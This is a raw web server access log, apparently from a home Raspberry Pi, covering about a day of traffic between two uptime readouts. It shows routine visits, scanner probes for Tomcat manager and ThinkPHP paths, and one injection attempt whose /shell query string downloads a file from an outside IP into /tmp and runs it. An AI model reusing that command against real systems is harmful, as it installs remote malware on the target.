Thu Feb 20 06:25:10 MST 2020 06:25:10 up 1 day, 17:00, 1 user, load average: 0.50, 0.34, 0.29 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 Tue13 41:08m 1:44 0.35s /usr/bin/lxsession -s LXDE-pi -e LXDE 117.239.149.94 - - [20/Feb/2020:15:24:58 +0000] "GET /manager/html HTTP/1.1" 404 0 "" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)" 39.135.1.160 - - [20/Feb/2020:15:39:31 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 39.135.1.160 - - [20/Feb/2020:15:39:41 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 39.135.1.160 - - [20/Feb/2020:15:39:41 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 39.135.1.160 - - [20/Feb/2020:15:39:44 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 39.135.1.160 - - [20/Feb/2020:15:39:44 +0000] "GET /html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 39.135.1.160 - - [20/Feb/2020:15:39:46 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 39.135.1.160 - - [20/Feb/2020:15:39:46 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 39.135.1.160 - - [20/Feb/2020:15:39:47 +0000] "GET /elrekt.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 39.135.1.160 - - [20/Feb/2020:15:39:48 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 39.135.1.160 - - [20/Feb/2020:15:39:49 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 91.243.166.97 - - [20/Feb/2020:16:21:32 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 91.243.166.97 - - [20/Feb/2020:16:21:40 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 45.5.132.66 - - [20/Feb/2020:17:48:53 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 5.101.64.77 - - [20/Feb/2020:19:20:44 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 5.101.64.77 - - [20/Feb/2020:19:39:30 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 92.39.52.134 - - [20/Feb/2020:20:38:03 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 209.20.103.246 - - [20/Feb/2020:20:48:52 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36" 209.20.103.246 - - [20/Feb/2020:20:48:54 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "http://162.250.19.7/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36" 140.82.241.227 - - [20/Feb/2020:20:49:42 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Mobile/15E148 Safari/604.1" 140.82.241.227 - - [20/Feb/2020:20:49:43 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "http://162.250.19.7/" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Mobile/15E148 Safari/604.1" 140.82.241.227 - - [20/Feb/2020:20:50:14 +0000] "GET /freedom/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Mobile/15E148 Safari/604.1" 140.82.241.227 - - [20/Feb/2020:20:50:20 +0000] "GET /freedom/freedom.zip HTTP/1.1" 200 76173 "http://162.250.19.7/freedom/" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Mobile/15E148 Safari/604.1" 5.101.64.77 - - [20/Feb/2020:20:52:05 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 77.247.110.15 - - [20/Feb/2020:20:53:01 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 140.82.241.227 - - [20/Feb/2020:21:03:42 +0000] "GET /freedom/freedom.zip HTTP/1.1" 200 76173 "" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Mobile/15E148 Safari/604.1" 93.171.218.24 - - [20/Feb/2020:21:04:13 +0000] "GET / HTTP/1.1" 400 0 "" "" 140.82.241.227 - - [20/Feb/2020:21:05:36 +0000] "GET /freedom/freedom.zip HTTP/1.1" 200 76173 "" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Mobile/15E148 Safari/604.1" 140.82.241.227 - - [20/Feb/2020:21:05:41 +0000] "GET /freedom/freedom.zip HTTP/1.1" 200 76173 "" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Mobile/15E148 Safari/604.1" 140.82.241.227 - - [20/Feb/2020:21:06:15 +0000] "GET /freedom/freedom.zip HTTP/1.1" 200 76173 "" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Mobile/15E148 Safari/604.1" 5.101.64.77 - - [20/Feb/2020:21:10:52 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 120.78.184.189 - - [20/Feb/2020:21:22:21 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 186.226.216.6 - - [20/Feb/2020:21:27:03 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 140.82.241.227 - - [20/Feb/2020:21:30:32 +0000] "GET /freedom/freedom.zip HTTP/1.1" 200 76173 "" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Mobile/15E148 Safari/604.1" 169.197.108.6 - - [20/Feb/2020:22:20:59 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 " 181.114.149.110 - - [21/Feb/2020:00:58:05 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 85.105.230.152 - - [21/Feb/2020:01:24:34 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 85.105.230.152 - - [21/Feb/2020:01:24:34 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 134.175.11.4 - - [21/Feb/2020:02:19:32 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 103.90.205.137 - - [21/Feb/2020:03:49:15 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 83.97.20.33 - - [21/Feb/2020:05:20:54 +0000] "GET / HTTP/1.0" 200 25000 "" "" 87.101.153.22 - - [21/Feb/2020:06:14:39 +0000] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 0 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 86.42.229.212 - - [21/Feb/2020:09:15:41 +0000] "GET / HTTP/1.1" 400 0 "" "" 45.152.6.58 - - [21/Feb/2020:09:45:25 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 45.152.6.58 - - [21/Feb/2020:09:45:25 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" "" 172.104.242.173 - - [21/Feb/2020:11:45:08 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" Fri Feb 21 06:25:05 MST 2020 06:25:06 up 2 days, 17:00, 1 user, load average: 0.28, 0.23, 0.26 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 Tue13 2days 2:19 0.35s /usr/bin/lxsession -s LXDE-pi -e LXDE